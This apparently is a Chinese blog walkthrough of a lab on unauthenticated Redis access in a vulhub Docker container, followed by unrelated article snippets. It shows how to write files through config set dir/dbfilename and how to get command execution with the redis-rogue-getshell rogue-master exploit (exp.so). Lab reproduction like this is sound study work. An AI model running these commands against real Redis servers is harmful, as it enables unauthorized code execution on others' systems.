当前位置：首页 > news >正文

redis未授权访问

news 2025/8/22 22:59:01

文章目录

搭建环境
漏洞复现
安装Exlopit并使用

前提条件：

1.安装docker
docker pull medicean/vulapps:j_joomla_2
2.安装docker-compose
docker run -d -p 8000:80 medicean/vulapps:j_joomla_2
3.下载vulhub

搭建环境

输入下面命令，来到Redis的路径下：

cd vulhub/redis/4-unacc

然后输入下面命令，安装容器并启动

sudo docker-compose up -d && sudo docker-compose up -d

如图，安装中：

在这里插入图片描述

安装完成并启动后查看容器状态：

sudo docker-compose ps -a

状态为已启动，redis的端口号是6379：

在这里插入图片描述

漏洞复现

用下面命令连接redis数据库，发现不需要账号密码，可以直接连接数据库：

redis-cli -h 127.0.0.1

说明redis存在未授权访问漏洞：

在这里插入图片描述

在数据库中用info命令查看数据库信息，可以查看：

在这里插入图片描述

然后在数据库中添加键值对和一个txt文件，并尝试访问文件，如果能访问成功，说明数据库有读写文件的权限。

新建键值对并查看

set name EMT

get name

执行命令后可以成功查看：
在这里插入图片描述

设置一个目录：

 config set dir /tmp/

设置新建一个文件：

 config set dbfilename EMT.txt

保存

save

如图，命令执行成功：

在这里插入图片描述

由于连接的是docker容器的数据库，所以我们可以在docker中查看刚刚新建的文件是否存在，首先登录容器：（-it后接的参数是容器的ID）

sudo docker exec -it 4-unacc-redis-1 /bin/bash

登录成功后用命令查看tmp目录下的文件是否创建成功：

ls /tmp

发现创建成功，说明redis数据库可以读取写入文件，这是redis存在的未授权访问漏洞：

在这里插入图片描述

安装Exlopit并使用

进入kali的tools目录下，执行下面命令，获取文件：

git clone https://github.com/vulhub/redis-rogue-getshell.git

下载完成后进入目录

cd redis-rogue-getshell/RedisModulesSDK

输入make进行编译，编译成功后会出现exp.so文件：

在这里插入图片描述

然后在redis-master.py的上级目录执行下面命令：

python3 redis-master.py -r 127.0.0.1 -p 6379 -L 10.9.75.45 -P 8888 -f RedisModulesSDK/exp.so -c "id"

如图，获得了uid和组ID：

在这里插入图片描述

输入whoami命令查看：

python3 redis-master.py -r 127.0.0.1 -p 6379 -L 10.9.75.45 -P 8888 -f RedisModulesSDK/exp.so -c "whoami"

执行成功，回显出数据库的名字：

在这里插入图片描述

说明该漏洞可以用来获取数据库信息

redis未授权访问

文章目录搭建环境漏洞复现安装Exlopit并使用前提条件： 1.安装docker docker pull medicean/vulapps:j_joomla_22.安装docker-compose docker run -d -p 8000:80 medicean/vulapps:j_joomla_23.下载vulhub 搭建环境输入下面命令，来到Redis的路径下&am…...

编程日记 2023/9/7 9:56:27

【数学建模竞赛】优化类赛题常用算法解析

优化类建模问题理解和建模：首先，需要深入理解问题，并将问题抽象为数学模型。这包括确定问题的目标函数、约束条件和决策变量。模型分析和求解方法选择：对建立的数学模型进行分析，可以使用数学工具和方法，…...

编程日记 2023/9/7 9:55:25

Python实现SSA智能麻雀搜索算法优化LightGBM回归模型(LGBMRegressor算法)项目实战

说明：这是一个机器学习实战项目（附带数据代码文档视频讲解），如需数据代码文档视频讲解可以直接到文章最后获取。 1.项目背景麻雀搜索算法(Sparrow Search Algorithm, SSA)是一种新型的群智能优化算法，在2020年提出&a…...

编程日记 2023/9/7 9:54:24

OpenCV（二十一）：椒盐噪声和高斯噪声的产生

目录 1.图像噪声介绍 2.椒盐噪声的产生 3.高斯噪声的产生 1.图像噪声介绍噪声介绍图像噪声是指在图像中存在的不期望的、随机的像素值变化，这些变化来源于多种因素。噪声可能导致图像细节模糊、失真或难以分辨。以下是几种常见的图像噪声类型： 1…...

编程日记 2023/9/7 9:53:23

【设计模式】Head First 设计模式——构建器模式 C++实现

设计模式最大的作用就是在变化和稳定中间寻找隔离点，然后分离它们，从而管理变化。将变化像小兔子一样关到笼子里，让它在笼子里随便跳，而不至于跳出来把你整个房间给污染掉。设计思想将一个复杂对象的构建与其表示相分离&…...

编程日记 2023/9/7 9:52:20

基于Python+Django深度学习的身份证识别考勤系统设计与实现

摘要我们的生活都是由信息技术在潜移默化的改变着，那么早先改变校园生活的是校园信息化，改变社会人生活是各种应用软件。出行我们依靠的是滴滴，外卖我们依靠的是美团等等。从信息技术的发展至今，各色各样的技术能够满足各类人群…...

编程日记 2023/9/7 9:51:19

Unity控制程序退出

大家好，我是阿赵。最近把公司的游戏发布到各种PC的游戏大厅，遇到了挺多奇怪的需求。之前介绍了一些Unity发布PC端控制窗口最大最小化、修改exe信息等问题，这次来探讨一下退出游戏的问题。一、收到奇怪的需求某游戏大厅要求&#xff0…...

编程日记 2023/9/7 9:50:18

1、引入命名空间 using namespace std; using std::cout; 2、引入基类成员 class Base{ public:void func(){cout << "Base::func()" << endl;} }; class Derived : public Base{ public:using Base::func;void func(int x){cout << "Deriv…...

编程日记 2023/9/7 9:49:17

Java环境的安装

最近博主也是在学校开始学习了Java，也通过老师知道了可以通过大学生学生证申(bai)请(piao) IDEA的企业版（社区版也是够学习用的）有很多同学还是没有搞懂便做一下分享。 🌱博客主页：青竹雾色间. 😘博客制作…...

编程日记 2023/9/7 9:48:16

【ES6】js中的proto和prototype

在JavaScript中，__proto__和prototype都是用于实现对象继承的关键概念。 1、proto __proto__是一个非标准的属性，用于设置或获取一个对象的原型。这个属性提供了直接访问对象内部原型对象的途径。对于浏览器中的宿主对象和大多数对象来说，可…...

编程日记 2023/9/7 9:47:15

工程项目管理系统源码-简洁+好用+全面-工程项目管理

工程项目管理系统是指从事工程项目管理的企业（以下简称工程项目管理企业）受业主委托，按照合同约定，代表业主对工程项目的组织实施进行全过程或若干阶段的管理和服务。系统定义工程项目管理企业不直接与该工程项目的总承包企…...

编程日记 2023/9/7 9:46:14

后端SpringBoot+前端Vue前后端分离的项目（二）

前言：完成一个列表，实现表头的切换，字段的筛选，排序，分页功能。目录一、数据库表的设计编辑二、后端实现环境配置 model层 mapper层 service层 service层单元测试 controller层三、前端实现 interface接…...

编程日记 2023/9/7 9:45:12

【5】openGL使用宏和函数进行错误检测

当我们编写openGL程序，没有报编译链接错误，但是运行结果是黑屏，这不是我们想要的。 openGL提供了glGetError 来检查错误，我们可以通过在运行时进行打断点查看glGetError返回值，得到的是一个十进制数，将其转…...

编程日记 2023/9/7 9:44:10

STM32 CAN快速配置（HAL库版本）

STM32 CAN快速配置（HAL库版本） 目录 STM32 CAN快速配置（HAL库版本）前言1 软件编程1.1 初始化1.1.1 引脚设置1.1.2 CAN参数设置1.1.3 CAN滤波器设置 1.2 CAN发送1.3 CAN接收 2 运行测试结束语前言控制器局域网总线（CA…...

编程日记 2023/9/7 9:43:07

【文末送书】全栈开发流程——后端连接数据源（二）

前言「作者主页」：雪碧有白泡泡「个人网站」：雪碧的个人网站「推荐专栏」： ★java一站式服务 ★ ★ React从入门到精通★ ★前端炫酷代码分享 ★ ★ 从0到英雄，vue成神之路★ ★ uniapp-从构建到提升★ ★ 从0到英雄&#xff…...

编程日记 2023/9/7 9:42:06

leetcode_27_最小栈

class MinStack { public:MinStack() {}void push(int val) {//只要是压栈，先将元素保存到_elem中_elem.push(val);//如果x小于_min中栈顶的元素，将x再压入_min中if(_min.empty() || val < _min.top()){_min.push(val);}}void pop() {//如果——min栈…...

编程日记 2023/9/7 9:41:05

01-ZooKeeper快速入门

1 Zookeeper概念 Zookeeper是Apache Hadoop项目下的一个子项目，是一个树形目录服务。 zookeeper翻译过来就是动物园管理员，它是用来管理Hadoop（大象）、Hive（蜜蜂）、Pig（小猪）的管…...

编程日记 2023/9/7 9:40:04

[经典面试题]JS的typeof和instanceof区别

一、typeof typeof 是一个一元操作符不是函数，所以不需要传递参数，使用方法非常简单：typeof A 对于基本类型 let s "Nicholas"; let b true; let i 22; let u; let sb undefined; console.log(typeof s); // string console.…...

编程日记 2023/9/7 9:39:02

C++内存区堆和栈

在C中，内存分成5个区，堆、栈、自由存储区、全局/静态存储区和常量存储区。栈，就是那些由编译器在需要的时候分配，在不需要的时候自动清除的变量的存储区。里面的变量通常是局部变量、函数参数等。堆，就是那些…...

编程日记 2023/9/7 9:38:01

QT中闹钟的设置

.h文件 #ifndef WIDGET_H #define WIDGET_H#include <QWidget> #include <QPushButton> //按钮 #include <QTextEdit> //文本 #include <QLabel> //标签 #include <QLineEdit> //行编辑器#include <QTimerEvent> //定时器事件类头文件 #…...

编程日记 2023/9/7 9:36:59

铭豹扩展坞 USB转网口突然无法识别解决方法

当 USB 转网口扩展坞在一台笔记本上无法识别，但在其他电脑上正常工作时，问题通常出在笔记本自身或其与扩展坞的兼容性上。以下是系统化的定位思路和排查步骤，帮助你快速找到故障原因：背景：一个M-pard（铭豹）扩展坞的网卡突然无法识别了，扩展出来的三个USB接口正常。…...

编程新知 2025/8/21 22:38:47

【OSG学习笔记】Day 18: 碰撞检测与物理交互

物理引擎（Physics Engine） 物理引擎是一种通过计算机模拟物理规律（如力学、碰撞、重力、流体动力学等）的软件工具或库。它的核心目标是在虚拟环境中逼真地模拟物体的运动和交互，广泛应用于游戏开发、动画制作、虚…...

编程新知 2025/8/22 2:46:36

《Playwright：微软的自动化测试工具详解》

Playwright 简介:声明内容来自网络，将内容拼接整理出来的文档 Playwright 是微软开发的自动化测试工具，支持 Chrome、Firefox、Safari 等主流浏览器，提供多语言 API（Python、JavaScript、Java、.NET）。它的特点包括&a…...

编程新知 2025/7/23 15:00:00

鸿蒙中用HarmonyOS SDK应用服务 HarmonyOS5开发一个医院查看报告小程序

一、开发环境准备工具安装： 下载安装DevEco Studio 4.0（支持HarmonyOS 5）配置HarmonyOS SDK 5.0确保Node.js版本≥14 项目初始化： ohpm init harmony/hospital-report-app 二、核心功能模块实现 1. 报告列表…...

编程新知 2025/7/22 6:12:57